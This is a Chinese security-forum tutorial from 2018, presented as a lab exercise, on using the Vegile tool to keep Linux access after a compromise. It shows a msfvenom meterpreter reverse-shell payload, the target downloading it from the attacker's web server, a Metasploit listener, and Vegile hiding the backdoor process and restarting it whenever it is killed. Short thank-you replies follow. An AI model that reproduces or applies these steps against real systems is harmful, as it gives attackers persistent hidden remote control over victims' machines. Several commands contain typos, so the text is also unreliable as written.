用户
搜索

[思路/技术] Vegile-加壳幽灵

  • TA的每日心情
    慵懒
    昨天 14:49
  • 签到天数: 176 天

    连续签到: 1 天

    [LV.7]常住居民III

    i春秋作家

    推荐小组副组长

    Rank: 7Rank: 7Rank: 7

    62

    主题

    175

    帖子

    752

    魔法币
    收听
    2
    粉丝
    4
    注册时间
    2017-12-4

    i春秋认证秦幽默灌水王突出贡献春秋文阁积极活跃奖核心白帽i春秋签约作者i春秋推荐小组楚

    夜莺 i春秋作家 推荐小组副组长 i春秋认证 秦 幽默灌水王 突出贡献 春秋文阁 积极活跃奖 核心白帽 i春秋签约作者 楼主
    发表于 2018-10-24 15:18:37 57619
    本帖最后由 夜莺 于 2018-10-24 15:23 编辑

    Vegile-加壳幽灵

    • 工具介绍
    • 项目地址
    • 工具使用
    • 模拟实验
    • 使用心得

    1. 工具介绍   

      Vegile是用于linux系统后渗透测试中的权限维持。Vegile这个工具将设置一个后门/rootkit,并且这个后门会直接隐藏spesisifc进程,无限连接metesploit,持续维持你的Metepreter会话,即使木马进程被杀死,它依然会再次重新运行,换句话说是该进程无限循环的。  

    2. 项目地址  

      幽灵  

      界面图   


    3. 工具使用-模拟实验  

      实验器材:Parrot虚拟机、Kali虚拟机、Vegile 、Metasploit

    • [1] 第一步:在靶机上clone下工具
    git clone https://github.com/Screetsec/Vegile.git

    下载幽灵

    • [2] 第二步:在攻击机生成Payload
    msfVENOM -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=自定义监听端口 -b "\x80" -f elf -o test

    • [3] 第三步:攻击机启动Apache,靶机上下载Payload

      servie apache2 start
      cp test /var/www/html
      weget 攻击机IP/test

        

    • [4]启动Metasploit,开启监听

      msfconsole
      use explot/multi/hander
      set lhost 监听ip 我这里是192.168.8.158
      set lport 监听端口 我这里是8888
      exploit -j

    • [5] 构造后门
      chmod +x test
      chmod +x Vegile
      赋予权限

      查看帮助

      ./Vegile --h
      ./Vegile --i  隐藏你的后门
      ./Vegile --u 无限复制你的metasploit会话,即使他被kill,依然可以再次运行

    植入后门

    Vegile --u test  这里填msfvenom生成的木马名字

    这里可以看到已经反弹会话了,我们kill掉

    sessions -k 7

    exploit -j  重新监听

      

    Vegile隐藏的两个后门进程分别是screetsec、tracer

    ps -aux | grep tracer
    kill 25856
    ps -aux



    发现我们kill进程后,又会生成新的进程,以此达到持续控制。

    再回头看Parrot中的会话是否可以反弹
      

    • [6] 使用心得  
    • 木马一定要放在Vegile目录下 ;
    • Vegile一般用于维持meterpreter会话;
    低调求发展,潜心学安全 个人博客www.shallowdream.cn
    发表于 2018-10-25 15:55:21
    厉害!学习到了,谢谢大佬分享,晚上回家试试去。
    使用道具 举报 回复
    发表于 2018-10-25 16:50:45
    不错,收藏一下,到时候去试一下
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发表于 2018-10-29 13:32:56
    感谢分享,以前都不知道呢
    使用道具 举报 回复
    发表于 2018-10-29 21:27:06
    感谢分享,小白过来学习学习
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册